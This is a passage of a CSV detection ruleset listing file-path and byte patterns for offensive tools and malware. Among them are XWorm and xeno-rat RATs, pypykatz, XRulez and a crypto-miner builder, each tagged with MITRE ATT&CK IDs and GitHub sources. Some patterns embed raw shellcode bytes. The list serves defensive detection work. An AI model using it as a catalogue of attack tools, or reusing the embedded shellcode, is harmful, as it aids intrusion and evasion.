- T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Worm.dll*",".{0,1000}\\Worm\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\WOW6432Node\Kidlogger*",".{0,1000}\\WOW6432Node\\Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","registry","10","10","N/A","N/A","N/A","N/A" "*\wraith.py*",".{0,1000}\\wraith\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-master.zip*",".{0,1000}\\wraith\-master\.zip.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-RAT-payloads*",".{0,1000}\\wraith\-RAT\-payloads.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-server.py*",".{0,1000}\\wraith\-server\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\wraith-server_v*.py*",".{0,1000}\\wraith\-server_v.{0,1000}\.py.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*\WritebleRegistryKeys.txt*",".{0,1000}\\WritebleRegistryKeys\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*\WriteOutputCommand.cs",".{0,1000}\\WriteOutputCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\ws-dirs.txt*",".{0,1000}\\ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\ws-files.txt*",".{0,1000}\\ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\WSPCoerce.cs*",".{0,1000}\\WSPCoerce\.cs.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","216","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z" "*\wstunnel.exe",".{0,1000}\\wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*\wstunnel\certs\*",".{0,1000}\\wstunnel\\certs\\.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*\x24\xC3\C:\\Windows\\System32\\calc.exe\x00*",".{0,1000}\\x24\\xC3\\C\:\\\\Windows\\\\System32\\\\calc\.exe\\x00.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "*\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69*",".{0,1000}\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x77\\x68\\x6f\\x61\\x6d\\x69.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*\x44\x8b\x01\x44\x39\x42*",".{0,1000}\\x44\\x8b\\x01\\x44\\x39\\x42.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\x4d\x5a\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21\x54\x68\x69\x73\x20\x70\x72*",".{0,1000}\\x4d\\x5a\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf8\\x00\\x00\\x00\\x0e\\x1f\\xba\\x0e\\x00\\xb4\\x09\\xcd\\x21\\xb8\\x01\\x4c\\xcd\\x21\\x54\\x68\\x69\\x73\\x20\\x70\\x72.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*\x64\Release\indirect.exe *",".{0,1000}\\x64\\Release\\indirect\.exe\s.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*\x64\Stardust.asm*",".{0,1000}\\x64\\Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" "*\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15*",".{0,1000}\\x83\\x64\\x24\\x30\\x00\\x48\\x8d\\x45\\xe0\\x44\\x8b\\x4d\\xd8\\x48\\x8d\\x15.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\x8b\x31\x39\x72\x10\x75*",".{0,1000}\\x8b\\x31\\x39\\x72\\x10\\x75.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\Xclipboard.ps1*",".{0,1000}\\Xclipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\xeno rat server.*",".{0,1000}\\xeno\srat\sserver\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xeno rat server\*",".{0,1000}\\xeno\srat\sserver\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xeno-rat\*",".{0,1000}\\xeno\-rat\\.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xeno-rat-main*",".{0,1000}\\xeno\-rat\-main.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48*",".{0,1000}\\xfc\\x48\\x83\\xe4\\xf0\\xe8\\xc8\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\\x20\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\\xed\\x52\\x41\\x51\\x48.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00*",".{0,1000}\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\*",".{0,1000}\\xfc\\xe8\\x89\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xd2\\x64\\x8b\\x52\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf0\\x52\\x57\\x8b\\x52\\x10\\x8b\\x42\\x3c\\x01\\xd0\\x8b\\x40\\x78\\x85\\xc0\\x74\\x4a\\x01\\xd0\\x50\\x8b\\x48\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*\XHVNC.exe*",".{0,1000}\\XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XKlog.txt*",".{0,1000}\\XKlog\.txt.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\xmrig.exe*",".{0,1000}\\xmrig\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\XOR_b64_encrypted\*",".{0,1000}\\XOR_b64_encrypted\\.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\xorencrypt.py*",".{0,1000}\\xorencrypt\.py.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\XRulez.cpp*",".{0,1000}\\XRulez\.cpp.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez.exe*",".{0,1000}\\XRulez\.exe.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","1","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez.sln*",".{0,1000}\\XRulez\.sln.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez.zip*",".{0,1000}\\XRulez\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XRulez\Injector\*",".{0,1000}\\XRulez\\Injector\\.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*\XWorm RAT V*",".{0,1000}\\XWorm\sRAT\sV.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XWorm.config*",".{0,1000}\\XWorm\.config.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\XWorm.exe*",".{0,1000}\\XWorm\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XWorm.rar*",".{0,1000}\\XWorm\.rar.{0,1000}","offensive_tool_keyword","Rhadamanthys","Fake Xworm - Rhadamanthys infostealer","T1583 - T1110 - T1082 - T1505 - T1567 - T1573","TA0006 - TA0003 - TA0004 - TA0005 - TA0009","N/A","N/A","malware","https://github.com/koyaxZ/XWorm-v5-Remote-Access-Tool","1","0","N/A","10","1","21","10","2023-10-03T01:34:12Z","2023-10-03T01:27:37Z" "*\XWorm.zip*",".{0,1000}\\XWorm\.zip.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\XWorm-RAT-*",".{0,1000}\\XWorm\-RAT\-.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\ysoserial\*",".{0,1000}\\ysoserial\\.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*\zerologon.py*",".{0,1000}\\zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 